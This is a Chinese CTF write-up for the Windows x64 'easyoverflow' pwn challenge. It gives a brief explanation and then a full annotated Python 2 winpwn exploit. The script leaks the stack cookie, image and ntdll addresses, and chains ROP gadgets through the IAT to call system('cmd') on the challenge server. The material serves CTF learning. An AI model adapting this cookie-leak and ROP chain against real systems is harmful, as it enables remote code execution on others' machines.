[Pwn] easyoverflow - cpt.shao xp0int Posted on Aug 28 2020 windows 下简单的栈溢出,rop过程比较复杂,code段可用gadget太少,可以先泄露栈上一个ntdll的地址,然后就可以使用ntdll里面丰富的gadget了。和linux系统不同,这里好像没有plt函数的概念,因此调用来自ucrtbase的函数时候要借助以下两条gadget。 ``` mov_rax_rax = ntdll_base + 0xbbd33 #0x00000001800bbd33: mov rax, qword ptr [rax]; ret; call_rax = ntdll_base + 0xa479d #0x00000001800a479d: call rax; nop; add rsp, 0x28; ret; ``` 思路是先通过泄露iat表上ucrtbase库函数地址puts,算ucrtbase的基地址,然后知道system地址以后就可以system("/cmd")。做法还是比较直接,就是winddbg preview的环境配置比较坑。而且windows不像linux可以直接加载自定义的动态库,打远程的时候偏移还得重新改。 ```python
# Exploit script from the write-up, reproduced as posted. It is Python 2
# (`print` statements, str-typed byte concatenation such as p.recv(6) + "\x00\x00")
# and drives the challenge service interactively over a socket. Every offset
# below is specific to the binary / ntdll / ucrtbase builds the author worked
# against -- the text above notes the offsets had to be re-derived for the
# remote -- so none of them carry over to another build.
from winpwn import *
import sys  # NOTE(review): imported but never referenced in this script
context.log_level = "debug"
# p = process(["./StackOverflow.exe", "1"])   # local-run variant, left commented out
p = remote("39.99.46.209", 13389)   # the challenge's remote endpoint
# de Bruijn-style pattern; only its first 0x100 bytes are used, and only as filler
cyclic = "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad"

# --- leak 1: the /GS stack cookie (the mitigation that would otherwise stop the overflow)
# Fill the 0x100-byte buffer up to a "@@@@" marker, then read the 6 bytes that
# come back after the marker. Presumably the service echoes the buffer without
# a terminator, so what follows the marker is the cookie stored directly after
# the buffer; the two high bytes are assumed to be zero and are padded back in.
# Only the send/recv pattern is visible here -- TODO confirm against the binary.
p.recvuntil("input:")
p.send("A"*0xfc + "@@@@")
p.recvuntil("@@@@")
cookie = u64(p.recv(6) + "\x00\x00")
print "cookie: %#x" % cookie

# --- leak 2: an image address (defeats ASLR for the executable) -------------
# Same marker trick at offset 0x118. The payloads below lay out
# buffer(0x100) + cookie(8) + two qwords(16) before the return address, i.e.
# 0x118, so this reads the saved return address; 0x12f4 is that address's
# offset from the image base in the author's build.
p.recvuntil("input:")
p.send("B"*(0x118-4) + "@@@@")
p.recvuntil("@@@@")
leak_code = u64(p.recv(6) + "\x00\x00")
print "leak_code : %#x" % leak_code
code_base = leak_code - 0x12f4

# Overwrite the return address with code_base+0x1000 (named `main` further
# down) so the program restarts and keeps accepting input.
p.recvuntil("input:")
p.send(cyclic[:0x100] + p64(cookie) + p64(0) + p64(0) + p64(code_base+0x1000))

# Cookie is re-leaked after the re-entry rather than reusing the earlier value
# (same procedure as leak 1).
p.recvuntil("input:")
p.send("A"*0xfc + "@@@@")
p.recvuntil("@@@@")
cookie = u64(p.recv(6) + "\x00\x00")
print "cookie: %#x" % cookie

# --- leak 3: an ntdll pointer sitting on the stack (defeats ASLR for ntdll) --
# The write-up needs this because the image itself offers too few gadgets;
# 0x6a271 is the leaked pointer's offset inside the author's ntdll build.
p.recvuntil("input:")
p.send("C"*(0x180-4) + "@@@@")
p.recvuntil("@@@@")
leak_ntdll = u64(p.recv(6) + "\x00\x00")
print "leak_ntdll: %#x" % leak_ntdll
ntdll_base = leak_ntdll - 0x6a271 # ntdll
print "ntdll_base: %#x" % ntdll_base

# Gadget and IAT addresses (build-specific; the trailing comments record the
# instruction sequence the author resolved at each address).
# NOTE(review): `hlt` and `call_puts` are defined but never used below.
hlt = ntdll_base + 0x6dca
pop_rax = ntdll_base + 0x2010c # 0x000000018002010c: pop rax; ret;
pop_rcx = ntdll_base + 0x9217b # 0x000000018009217b: pop rcx; ret;
iat_puts = code_base + 0x2180   # IAT slot holding the resolved ucrtbase puts
iat_read = code_base + 0x2178   # IAT slot holding the resolved read
call_puts= code_base + 0x1078
# No PLT on Windows (see the text above): an imported function is reached by
# loading its IAT slot into rax and calling through rax.
mov_rax_rax = ntdll_base + 0xbbd33 #0x00000001800bbd33: mov rax, qword ptr [rax]; ret;
# After the call returns, `add rsp, 0x28` skips the 0x28 filler bytes each
# payload places after the chain, and `ret` then continues with what follows.
call_rax = ntdll_base + 0xa479d #0x00000001800a479d: call rax; nop; add rsp, 0x28; ret;
pop_rdx_r11 = ntdll_base + 0x8fb37 # 0x000000018008fb37: pop rdx; pop r11; ret;
pop_r8 = ntdll_base + 0x2010b # 0x000000018002010b: pop r8; ret;
main = code_base + 0x1000

# --- chain 1: puts(iat_puts), which prints the resolved puts pointer ---------
# rcx (first argument under the Windows x64 convention) = the IAT slot address;
# rax = [iat_puts] = puts; then call rax.
rop=[]
rop.append(pop_rcx)
rop.append(iat_puts)
rop.append(pop_rax)
rop.append(iat_puts)
rop.append(mov_rax_rax)
rop.append(call_rax)
rop = "".join(map(p64, rop))
p.recvuntil("input:")
# "B"*0x28 is consumed by the gadget's `add rsp, 0x28`; the final `ret` lands on `main`.
p.send("A"*0x100 + p64(cookie) + p64(0) + p64(0) + rop + "B"*0x28 + p64(main))
p.recvline()
p.recvline()
p.recvline()
# The fourth line carries the raw puts pointer. 0x7fb60 and 0xaafa0 are the
# puts and system offsets in the author's ucrtbase build.
leak_utbase = u64(p.recvline()[:6] + "\x00\x00")
print "leak_utbase: %#x" % leak_utbase
utbase = leak_utbase - 0x7fb60 # puts_off
system = utbase + 0xaafa0 # system_off
print "utbase: %#x" % utbase
print "system: %#x" % system

# --- chain 2: read(0, code_base+0x3c00, 8), followed by system(code_base+0x3c00)
# Arguments go in rcx, rdx, r8; the r11 value is just a side effect of the
# `pop rdx; pop r11` gadget. code_base+0x3c00 is a writable spot in the image
# used as the command buffer.
rop = []
rop.append(pop_rcx)
rop.append(0)
rop.append(pop_rdx_r11)
rop.append(code_base + 0x3c00)
rop.append(0)
rop.append(pop_r8)
rop.append(0x8)
rop.append(pop_rax)
rop.append(iat_read)
rop.append(mov_rax_rax)
rop.append(call_rax)
rop = "".join(map(p64, rop))
# Runs once call_rax's `add rsp, 0x28` has skipped the filler: rcx = the buffer
# that read() just filled, then system.
rop1 = [pop_rcx, code_base + 0x3c00, system]
rop1 = "".join(map(p64, rop1))
# windbgx.attach(p, "~0s\nbp StackOverflow+0x10c9\n")   # debugger hook for local runs, disabled

# Leak the cookie one more time before the final overflow.
p.recvuntil("input:")
p.send("A"*0xfc + "@@@@")
p.recvuntil("@@@@")
cookie = u64(p.recv(6) + "\x00\x00")
print "cookie: %#x" % cookie
# An exactly-0x100-byte input with no overflow; why this extra round is needed
# is not visible from the script -- presumably it advances the service's input loop.
p.recvuntil("input:")
p.send("A"*(0x100))
p.recvuntil("input:")
p.send(cyclic[:0x100] + p64(cookie) + p64(0) + p64(0) + rop + "B"*0x28 + rop1)
# These 8 bytes are what read() stores at code_base+0x3c00 and thus become the
# system() argument. NOTE(review): the text above says system("/cmd"); the
# script actually sends "cmd".
p.send("cmd".ljust(8, "\x00"))
# ntdll_base = leak_ntdll - 0x6ce51   # alternative offset for another ntdll build, kept by the author
#flag{You_Know_Windows_ASLR_1s_Funny}
p.interactive()
```
打赏还是打残,这是个问题 赏 Wechat Pay Alipay 0x00 题目名称 [强网先锋] Funhash - Donek1